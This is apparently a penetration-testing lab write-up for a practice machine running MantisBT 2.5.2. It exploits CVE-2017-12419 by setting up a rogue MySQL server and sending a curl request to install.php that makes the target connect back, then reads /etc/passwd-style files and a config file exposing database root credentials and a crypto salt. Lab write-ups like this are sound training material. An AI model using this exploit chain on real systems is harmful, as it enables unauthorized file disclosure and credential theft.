InfoSec LAB

Mantis_OffSec_Arbitrary_File_Read

Created: 2 min read

Arbitrary File Read

The target MantisBT instance appears to be likely be vulnerable to CVE-2017-12419

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mantis_offsec/Rogue-MySql-Server]
└─$ php roguemysql.php
Enter filename to get [/etc/passwd] > 
[.] Waiting for connection on 0.0.0.0:3306

Setting up the rogue MySQL server

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mantis_offsec]
└─$ curl -s "http://$IP/bugtracker/admin/install.php?install=3&hostname=$tun0"

Invoking the DB installation

Arbitrary file read confirmed

Version Information

Enter filename to get [/var/www/html/bugtracker/config/config_inc.php] > /var/www/html/bugtracker/core/constant_inc.php
[.] Waiting for connection on 0.0.0.0:3306
[+] Connection from 192.168.135.204:39534 - greet... auth ok... some shit ok... want file... 
[+] /var/www/html/bugtracker/core/constant_inc.php from 192.168.135.204:39534:
<?php
/**
 * MantisBT Constants
 *
 */
 
/**
 * Mantis Version
 */
define( 'MANTIS_VERSION', '2.5.2' );
define( 'FILTER_VERSION', 'v9' );
 
[...REDACTED...]

The /var/www/html/bugtracker/core/constant_inc.php file leaks the version information; Mantis Bug Tracker 2.5.2

Configuration File

  • During the web enumeration, the web root directory was leaked; /var/www/html/bugtacker
  • Additionally, it was revealed that attempting to install the MantisBT instance with the default DB credential led to updating the configuration file; config/config_inc.php
Enter filename to get [/etc/passwd] > /var/www/html/bugtracker/config/config_inc.php       
[.] Waiting for connection on 0.0.0.0:3306
[+] Connection from 192.168.135.204:39526 - greet... auth ok... some shit ok... want file... 
[+] /var/www/html/bugtracker/config/config_inc.php from 192.168.135.204:39526:
<?php
$g_hostname               = 'localhost';
$g_db_type                = 'mysqli';
$g_database_name          = 'bugtracker';
$g_db_username            = 'root';
$g_db_password            = 'SuperSequelPassword';
 
$g_default_timezone       = 'UTC';
 
$g_crypto_master_salt     = 'OYAxsrYFCI+xsFw3FNKSoBDoJX4OG5aLrp7rVmOCFjU=';

There is the DB Credential; root:SuperSequelPassword Validation will be made against the target MySQL instance

Interactive Graph View

Backlinks